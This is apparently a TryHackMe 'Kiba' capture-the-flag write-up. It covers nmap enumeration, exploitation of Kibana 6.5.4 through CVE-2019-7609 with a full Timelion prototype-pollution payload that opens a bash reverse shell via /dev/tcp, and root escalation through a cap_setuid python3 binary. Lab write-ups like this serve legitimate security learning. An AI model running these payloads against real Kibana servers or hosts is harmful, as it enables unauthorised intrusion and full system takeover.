CREATE & DESTROY


Kiba | TryHackMe

Identify the critical security flaw in the data visualization dashboard that allows remote code execution. Easy difficulty.

As usual, an nmap scan starts enumeration.

nmap -sC -sV -T4 10.10.106.48 -oN initial.scan 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-12 19:54 BST
Nmap scan report for 10.10.106.48
Host is up (0.073s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 9d:f8:d1:57:13:24:81:b6:18:5d:04:8e:d2:38:4f:90 (RSA)
|   256 e1:e6:7a:a1:a1:1c:be:03:d2:4e:27:1b:0d:0a:ec:b1 (ECDSA)
|_  256 2a:ba:e5:c5:fb:51:38:17:45:e7:b1:54:ca:a1:a3:fc (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.45 seconds

Initial suggestions are that we’ll have to get access to the server via the webapp.

index.html

Enumerating the directories and poking around doesn't return much, so it's back to nmap for an all-ports scan, which turns up two more services that the default top-1000 scan missed:

5044/tcp open  lxi-evntsvc
5601/tcp open  esmagent

nmap's service names here are just guesses from its port table; 5601 is Kibana's default port and 5044 is the Logstash Beats input. It turns out there was a web app running on port 5601 after all…

After some time exploring the web app you're able to answer questions 1, 2 and 3. We're running Kibana 6.5.4, which is vulnerable to CVE-2019-7609, a prototype pollution bug in the Timelion visualiser for which there's a public exploit on GitHub. Timelion's .props() lets you set arbitrary nested properties on the series label object, and nothing stops the path from walking through __proto__, so the assignments below land on Object.prototype instead of the label. Every plain object in the Kibana process then appears to have an env property. When Kibana next spawns a Node child process (opening the Canvas app is the usual trigger), child_process reads that polluted env, so the child starts with NODE_OPTIONS=--require /proc/self/environ and loads its own environment file as JavaScript; the AAAA variable at the front of that file is the code that gets executed, and the trailing // comments out the rest. With a listener waiting on 10.18.105.64:1234, pasting the expression into Timelion and running it is all it takes:

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/10.18.105.64/1234 0>&1\'");//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
If only it were always this easy…

We land as the kiba user and get user.txt in the home directory. Now to escalate. Going by the hint on the page served on port 80, I'm assuming Linux capabilities are going to be the vector here.

getcap -r / 2>/dev/null
/home/kiba/.hackmeplease/python3 = cap_setuid+ep

Looks like a copy of the python3 binary inside our home directory has been granted cap_setuid, which lets it change its UID without being setuid root, so off to GTFOBins for some help…

/home/kiba/.hackmeplease/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
root@ubuntu:/home/kiba/.hackmeplease# 

And with that it’s root access and on to the root flag.
